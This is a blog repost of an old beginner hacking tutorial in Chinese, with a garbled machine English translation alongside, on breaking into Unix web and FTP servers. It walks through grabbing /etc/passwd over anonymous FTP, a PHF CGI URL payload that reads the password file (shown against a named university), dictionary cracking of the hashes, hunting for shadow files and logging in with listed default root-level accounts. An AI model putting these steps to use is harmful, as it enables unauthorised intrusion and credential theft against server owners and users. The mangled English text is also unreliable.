Pages

Jumat, 11 November 2011

侍服器骇客入门 Servo control hackers entry

Lord Dredd 原著Arthur Chen 译 Lord Dredd translation of the original Arthur Chen

前言: Introduction:

我每天至少都会被刚学习入侵的人(beginning hackers)问起同样的问题五次以上:"我要如何hack?" , "是否有办法入侵网站(web site)?" 嗯! 没错! 是有!而且不只那么一种, 事实上入侵网站的方法百百种! 这边我要提出几种方法,好让初学者能知道从何处着手! 每一位Hacker 都有各自入侵的方法, 但是入侵web 和ftp侍服器却是最简单的方法之一! 在此我首先假定你已经对某些UNIX 操作系统和网站(web server) 的运作有了基础的知识,但是我也会稍微提一下这方面的东西好让那些不知道的人看一下! I will be at least a day just to learn who the invasion (beginning hackers) asked the same question more than five times: "How do I hack?", "Is there a way the invasion site (web site)?" Ah! Yes! Is There! and not only then one, in fact, the invasion site are hundreds of ways kinds! here I want to raise several ways, so that beginners can know where to begin! every Hacker has its own method of invasion, but invasion of web and ftp servo control is one of the easiest way! in my first assume you have some UNIX operating systems and web sites (web server) have a basic knowledge of the operation, but I will mention a little This side of things so that people who do not know look!

第一部份: 简易UNIX 指令 Part I: Simple UNIX commands

大部份在DOS 上使用的指令在UNIX 及Linux 上都有对等的指令,底下列出的是在使用SHELL帐号(shell account)时最主要的一些指令: Most use the DOS commands on both the UNIX and Linux equivalent command is listed under the account using the SHELL (shell account) when some of the most important commands:

HELP=HELP HELP = HELP
COPY=CP COPY = CP
MOVE=MV MOVE = MV
DIR=LS DIR = LS
DEL=RM DEL = RM
CD=CD CD = CD

要看谁同时也在系统上你可以键入WHO 指令,要知道系统上某一位使用者的资料, 可以键入FINGER , 这些基本的UNIX 指令可以让你得到你正使用系统的信息! To see who is on the same system you can also type the WHO command on the system to know that a particular user's data, you can type FINGER, these basic UNIX commands allow you to get the information you are using the system!

第二部份: 破解密码(Cracking Passwords) Part II: crack the code (Cracking Passwords)

在UNIX 系统上, 所有系统使用者的密码都存放在一个档案中!这个档案被摆在/etc这个目录底下, 它的檔名就叫做passwd, 我敢打赌! 你一定在想说:" 好! 我所要做的就是抓出这个叫做/etc/passwd 的档案, 然后呢我就是个骇客了!!!" 呵!如果你这么想, 那你就死定了(dead wrong)! 在passwd 文件里,所有帐号的密码都已经经过重新编码(encrypted)过了! 这些密码是经过所谓的"单向编码" (one-way encrypted),也就是说你没有办法将它们译码(反向译码decrypt), 但是还是有程序可以让你得到这些原始的密码!目前我找到最好的破解密码的程序叫做"Cracker Jack",这个程序使用一个包含数千字的字典文件(dictionary On UNIX systems, all system users passwords are stored in a file! This file is placed in the / etc directory under, its name is called passwd, I bet! You must be say: "Good! I have to do is catch out of the called / etc / passwd file, and then what I have is a hacked!!! "Oh! If you think so, then you're dead (dead wrong)! in the passwd file , all accounts have been re-encoded password (encrypted) over it! the password is the result of the so-called "one-way coding" (one-way encrypted), which means you have no way to decode them (reverse decoding decrypt ), but there are applications that let you get the original password! now I find the best password cracking program called "Cracker Jack", this program uses a dictionary file that contains thousands of words (dictionary
file), 它会把字典文件里的每个字先取出编码(encrypted),然后再把经过编码后得出的值(encrypted forms) 用来和passwd 文件里的密码(当然是经过encrypted 的密码)一一比对, 一旦发现有相同的, 程序就会马上通知你! Cracker Jacker 可以在我的网站中找到: file), it will file for each dictionary word first to get codes (encrypted), and then derived from the value encoded (encrypted forms) and the passwd file for the password (encrypted of course, is the result of the password) eleven comparison, if found to have the same, the program will immediately notify you! Cracker Jacker can be found at my website:

http://www.geocities.com/Silicon Valley/9185 http://www.geocities.com/Silicon Valley/9185
(译者按: 我去找过了,好象没有! 建议去国内的站找!) (Translator's note: I went to see, and if not! Recommendations to the domestic station to find!)

字典文件(wordlists) 可以在下面这个ftp 站找到: Dictionary file (wordlists) can be found at the following ftp site:

ftp://sable.ox.ac.uk/pub/wordlists ftp://sable.ox.ac.uk/pub/wordlists

通常我会上到站上然后到American 目录下去抓字典文件, 一旦你到了那,抓下这个档: I usually on arrival at the directory and then go to the American dictionary file grasp, once you get to it and grabbed this file:

dic-0294.tar.Z dic-0294.tar.Z

大概4 MB, 要用这个档必需先解压缩, 你可以用Gzip (DOS)或者Winzip (windows),解压缩后大约是一个8 MB 左右的纯文字文件,你最好是把它摆在破解程序同样的目录下,要知道怎么用Cracker Jacker,读读内含在程序里的说明档案就可以了! About 4 MB, use this file must be decompressed, you can use Gzip (DOS) or Winzip (windows), uncompressed is about 8 MB of text files around, you'd better put it in the cracking process the same directory, to know how to use Cracker Jacker, read the instructions included in the program files on it!

第三部份困难的部份(找出密码文件) Most difficult part of the third (to find out the password file)

截至目前为止我谈的都是入侵侍服器简单的部份,现在要进入较困难的部份了! 很明显的, 如果系统管理者有那么一个档案存放密码,你想他会那么简简单单的就摆在那里等你来取用吗??? 你必需找个好方法不用进入系统(without logging into the system)就可以拿到系统的密码文件/etc/passwd ! 这边有两个方法可以试试, 或许可以成功!通常/etc 这个目录在FTP 上并没有被琐住, 你可以用FTP client 程序以anoymously匿名帐号先签入系统, 然后检察一下/etc 目录下的passwd 文件读取是否有被设限,如果没有对anoymously 帐号设限, 那么就抓下来直接跑Cracker Jacker! 如果有设限那么就试试B 计划(Plan B)! 在某些系统上, /cgi-bin 目录下会有个叫PHF 的档案,如果你准备入侵的计算机主机有的话那么你就福气啦! PHF 允许使用者对网站系统里的档案做远程读取! (当然也包含/etc/passwd 在内) 要用这个方法可以在你的浏览器里键入这个: So far I am talking about are simple invasion of servo control part, to proceed to the more difficult part of it! Clearly, if the system administrator so a file stored password, so you think he would simply to put in there waiting for you to access it??? you do not need to find a good way into the system (without logging into the system) you can get the system password file / etc / passwd! here are two ways to try, may successfully! usually the / etc directory on the FTP has not been trivial to live, you can use FTP client program to anoymously anonymous account check in the system, then Attorney General about the / etc directory have read the passwd file is set to limit, if not anoymously account restrictions, then catch a direct run down the Cracker Jacker! restrictions so if you try Plan B (Plan B)! on some systems, / cgi-bin directory will be a file called PHF, if you are preparing to invade the host computer so you have one lucky friends! PHF allows users of the site to do a remote file system to read! (of course, include / etc / passwd included) to use This method can in your browser, type this:

URL:http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd URL: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd

里头xxx.xxx.xxx 就把你要hack 的网站置换上去即可! You want to hack inside xxx.xxx.xxx put up the site can be replaced!

例如: 我要hack 圣路易大学(我已经hack 过了) 我就用: For example: I want to hack St. Louis University (I have been a hack) I use:
http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd http://www.slu.edu/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd

你不用麻烦再去试www.slu.edu 了! 我已经通知他们有关系统的漏洞了! You do not trouble to go try www.slu.edu it! I have informed them of the loopholes in the system!
这边有个提示! www.spawn.com 和www.garply.com Here are tips! Www.spawn.com and www.garply.com

以上的方法如果都试不通, 那就试试其它你能想得到的方法喽! 如果呢: 你抓到的passwd 档里面第二个部份是X, ! 或者是* , 那么密码就已经被隐藏起来了!隐藏的目地无非是加强系统安全罢了, 避免密码文件被骇客或者被那些不受欢迎的人物任意取得!不幸的!并没有办法可以完全将密码文件藏起来! 通常会有未经隐藏的密码备份文件存在系统里!试试找找看这些档案: /etc/shadow 或其它类似的档案! If the above methods are unreasonable test, try other ways you can think of myself! If it: you caught the second part of the passwd file which is X,! Or *, then the password has been hidden it! hidden purpose to strengthen the system security is nothing more than nothing, to avoid the password file used by hackers or by any person who made unwelcome! unfortunately! and no way to completely hide the password file! usually not hidden Password backup file exists system! try look to see these files: / etc / shadow or other similar files!

第四部份: 签入"你的" 新Shell Part IV: check "your" new Shell

OK! 这边是你把上面辛苦得来的passwd 及耗时费工Cracker Jack后得到的帐号密码拿来使用的时候了!!! 打开你的telnet client 程序, telnet到你准备入侵的侍服器去吧(例如: www.slu.edu)! OK! Here is that you put above the hard-earned time and money passwd and Cracker Jack used the username and password obtained using the time!!! Open your telnet client program, telnet to your preparing to invade the servo control go (for example: www.slu.edu)!

当你连到站上后首先你可能会看到这个侍服器所使用操作系统的一些信息(通常是UNIX, linux, aix, irix, ultrix, bsd 或甚至是DOS 和VAX/Vms),然后在login 屏幕出现时, 直接在系统要求login 的地方直接键入你所得来的帐号密码即可! 这时候你就可以用你所有的UNIX 知识要系统做你想要做的事了! When you are on even after the first station you see the servo may be used by the operating system, some information (usually UNIX, linux, aix, irix, ultrix, bsd or even DOS and VAX / Vms), then login screen appears, login directly in the system requirements where the proceeds directly to the account, type your password! this time you can use your knowledge to all UNIX systems do you want to do it!
但是切记: Hacking 并不是要散拨病毒或者是破坏别人的计算机系统! Hack是以你的知识来增进知识! 懂吗!? But remember: Hacking is not a casual aside to the virus or damage someone else's computer system! Hack is based on your knowledge to enhance their knowledge! Understand me!?

第五部份: 给新鲜人的需知 Part 5: Know who to fresh

在你成为一名真正的骇客之前,你必需先弄清楚所谓骇客的定义以及当一名有道德的骇客! 如果你只是刚学着当一名骇客, 那么你最好先先熟悉UNIX 环境的运作,然后到图书馆找点有关网络上操作系统如何运作的书来看看!或者到书店找点网络安全方面的书读读! 通常这方面的书对骇客们如何破解系统都会有介绍!你也可以从里面得到不少助益! You become a real hacker before, you must first clarify the definition of the so-called hackers, and when an ethical hacker! If you only just learn when a hacker, then you'd better be familiar with UNIX operating environment, and then to the library to find a point on the network operating system on the books to see how it works! or point to the bookstore to find books read network security! usually this book for hackers to crack the system will have introduced! You can also get a lot of help from the inside!

译者按: 这份档案写得浅显易懂! 但是讲的好象太"入门" 了,并没有做很深入的探讨!以上两个方法我试着去hack 一些站台, 但是成功的机率很低! 很灰心!不过对一个初学者却是"启蒙" 的好文件! 我就是读这篇文章开始起手的! Translator's note: This file is written easy to understand! But if too much talk about "Getting Started", and did not do a very in-depth discussion! Above two methods, I tried to hack some of the sites, but very low probability of success ! very disappointed! but for a beginner is "enlightenment" of good file! I just read the beginning of this article's hands!

这边对passwd file 再做点说明, 通常一份密码文件格式如下: Here do point to the passwd file description, usually a password file format is as follows:

root:1234aaab:0:1:Operator:/:/bin/csh root: 1234aaab: 0:1: Operator: /: / bin / csh
nobody:*:12345:12345::/: nobody: *: 12345:12345:: /:
daemon:*:1:1::/: daemon: *: 1:1:: /:
sys:*:2:2::/:/bin/csh sys: *: 2:2 ::/:/ bin / csh
sun:123456hhh:0:1:Operator:/:/bin/csh sun: 123456hhh: 0:1: Operator: /: / bin / csh
bin:*:3:3::/bin: bin: *: 3:3:: / bin:
uucp:*:4:8::/var/spool/uucppublic: uucp: *: 4:8:: / var / spool / uucppublic:
news:*:6:6::/var/spool/news:/bin/csh news: *: 6:6:: / var / spool / news: / bin / csh
audit:*:9:9::/etc/security/audit:/bin/csh audit: *: 9:9:: / etc / security / audit: / bin / csh
sync::1:1::/:/bin/sync sync:: 1:1 ::/:/ bin / sync
sysdiag:*:0:1:Old System sysdiag: *: 0:1: Old System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag Diagnostic: / usr / diag / sysdiag: / usr / diag / sysdiag / sysdiag
sundiag:*:0:1:System sundiag: *: 0:1: System
Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag Diagnostic: / usr / diag / sundiag: / usr / diag / sundiag / sundiag
tom:456lll45uu:100:20::/home/tom:/bin/csh tom: 456lll45uu: 100:20:: / home / tom: / bin / csh
john:456fff76Sl:101:20:john:/home/john:/bin/csh john: 456fff76Sl: 101:20: john: / home / john: / bin / csh
henry:AusTs45Yus:102:20:henry:/home/henry:/bin/csh henry: AusTs45Yus: 102:20: henry: / home / henry: / bin / csh
harry:SyduSrd5sY:103:20:harry:/home/harry:/bin/csh harry: SyduSrd5sY: 103:20: harry: / home / harry: / bin / csh
steven:GEs45Yds5Ry:104:20:steven:/home/steven:/bin/csh steven: GEs45Yds5Ry: 104:20: steven: / home / steven: / bin / csh
+::0:0::: +:: 0:0:::

其中以":" 分成几个字段, 底下以tom:456lll45uu:100:20:tom Among them, ":" is divided into several fields, under the tom: 456lll45uu: 100:20: tom
chang:/home/tom:/bin/csh 为例: chang: / home / tom: / bin / csh, for example:

User Name: tom User Name: tom
Password: 456lll45uu Password: 456lll45uu
User No: 100 User No: 100
Group No: 20 Group No: 20
Real Name: tom chang Real Name: tom chang
Home Dir: /home/tom Home Dir: / home / tom
Shell: /bin/csh Shell: / bin / csh

你可以发现上面诸如nobody, daemon, sys, bin, uucp, news, audit, sysdiag, You can find the top like nobody, daemon, sys, bin, uucp, news, audit, sysdiag,
sundiag 等的密码字段都是* 就是说它们的帐号已经被关掉了!没办法以这些帐号签入系统了! sundiag password fields are * so that their account has been turned off! no way to check these accounts the system!

一般一个系统第一次安装时会有一些default 帐号和密码: Generally when a system is first installed there will be some default username and password:

ACCOUNT PASSWORD ACCOUNT PASSWORD
----------- ---------------- ----------- ----------------
root root root root
sys sys / system / bin sys sys / system / bin
bin sys / bin bin sys / bin
mountfsys mountfsys mountfsys mountfsys
adm adm adm adm
uucp uucp uucp uucp
nuucp anon nuucp anon
anon anon anon anon
user user user user
games games games games
install install install install
reboot 给"command login" 用的 reboot to the "command login" with the
demo demo demo demo
umountfsys umountfsys umountfsys umountfsys
sync sync sync sync
admin admin admin admin
guest guest guest guest
daemon daemon daemon daemon

其中root mountfsys umountfsys install (有时候sync也是) 等都是root level 帐号, 也就是拥有sysop (系统管理者) 的权限, 完全的权限!!!当你尝试签入某些系统时这些原始帐号及密码都是很好的方向,特别是如果碰到那些少根筋的系统管理者, 嘿嘿! 搞不好你就莫明其妙当了root user 了!!! One root mountfsys umountfsys install (sometimes sync also) are all root level account, it is to have sysop (administrator) privileges, full access!!! When you try to check some of these original system ID and password is a very good direction, especially if you encounter a system administrator who Shaogen Jin, hey! they might not understand when you are a root user on a!!!

最后我要说明一点: 我不是骇客高手, 有问题不要问我, 问我我也不懂!翻译这篇文章只是分享一下心得! 希望各位先进多多切搓! 这边我要再介绍一篇入门的文件: Finally, I want to point out: I am not a hacker master, do not ask me a question, ask me I do not know! Translation of this article is to share experiences! Hope that a lot of advanced cut rub! Here I have to introduce an entry- file:

UNIX: A Hacking Tutorial 骇客导读by Sir Hackalot UNIX: A Hacking Tutorial hackers REVIEW by Sir Hackalot

写得很不错, 原文颇长, 哪天我有空了, 再把它翻成中文! 和大家分享! Write very well, the original long, someday I have time, and then it is translated into Chinese! And share!

Hackalot 先生说了一个故事, 他说有人曾说最近Hacking 好象越来越难了!原因无它, 一些系统的漏洞一再被骇客们挖出来!然后系统管理者们也因应地把漏动补起来, 于是要想再hack 也就越难! 但是我们这位Sir Hackalot 持反对意见, 他说: Hackalot President told a story, he said has been said recently Hacking seems more and more difficult! Because without it, some of the loopholes in the system has been repeatedly dug hackers! And system administrators are also due to be moving up to the drain up, so in order to re-hack the more difficult it! But we who oppose the Sir Hackalot, he said:

最近几年来一些计算机零售商(Value Added Reseller) 纷纷成立,当零售商和买主谈妥交易后, 马上就去架设硬件, 然后植入UNIX 操作系统,然后就交给买主完成交易,一般的买主并不懂UNIX 的运作! 等到发现系统有漏洞而被入侵时,便又回过头找这些零售商修补漏洞, 问题是: 零售商卖硬件顺便植入操作系统,这些作软件植入的人并不一定会对系统安全懂到哪里,而买主们也是鲜少会花钱请专业人士们负责系统的管里和维修! 于是乎! 一些漏洞还是留在那里等着骇客们入侵, ...不知您对这个故事看法如何? 当然Sir Hackalot 是美国人, 讲的是美国故事,台湾的状况可能不尽相同, 但我想可能相差不到哪里! 就我所知,某些学校在采购计算机时就是这种状况! 学校方面负责采购的人不一定懂这方面的东西,卖东西的呢收到定单后便去架设,架设完后把操作系统弄好了交给校方, 但是呢!架设的人可能仅只是外务员出身! 稍微懂得如何install 操作系统! 其它的就....,所以交给学校时可能连一些最基本的系统安全根本没去顾到! 我想一些学校都是如此了!一般公司行号在架设网站时可能也不会顾到这么多!! In recent years a number of computer retailers (Value Added Reseller) have been established, when retailers and buyers negotiated transaction, immediately went to set up the hardware, and then implanted in the UNIX operating system, and then handed over to the buyer to complete the transaction, the buyer and the general understand the operation of UNIX! wait until there are loopholes in the system were found to invasion, in turn come back to find these retailers fix vulnerabilities, the question is: retailers selling hardware implanted in the way the operating system, such as software embedded do not necessarily System Security will know where to go, but buyers are also rarely spend money to hire professionals who will be responsible for system management and maintenance of inside! Ever! some loopholes still remain there waiting for the invasion of hackers, ... I wonder if you views on this story? of course Sir Hackalot Americans, the story about the United States, Taiwan's situation may be different, but I think I may not much difference! far as I know, some schools in the procurement of computer is this state of affairs! schools responsible for the procurement not necessarily understand this stuff, selling stuff after it received orders to set up, set up after the operating system somehow to the school, but it! erected may Foreign workers only just born! a little know how to install operating system! the other to the school on ...., so may even the most basic security did not care to go! I think some schools are so be it! general line number in the website hosting company may not care to so many!!

所以呢! Hacking is not so difficult as you think, isn't it? So! Hacking is not so difficult as you think, isn't it?

Tidak ada komentar:

Posting Komentar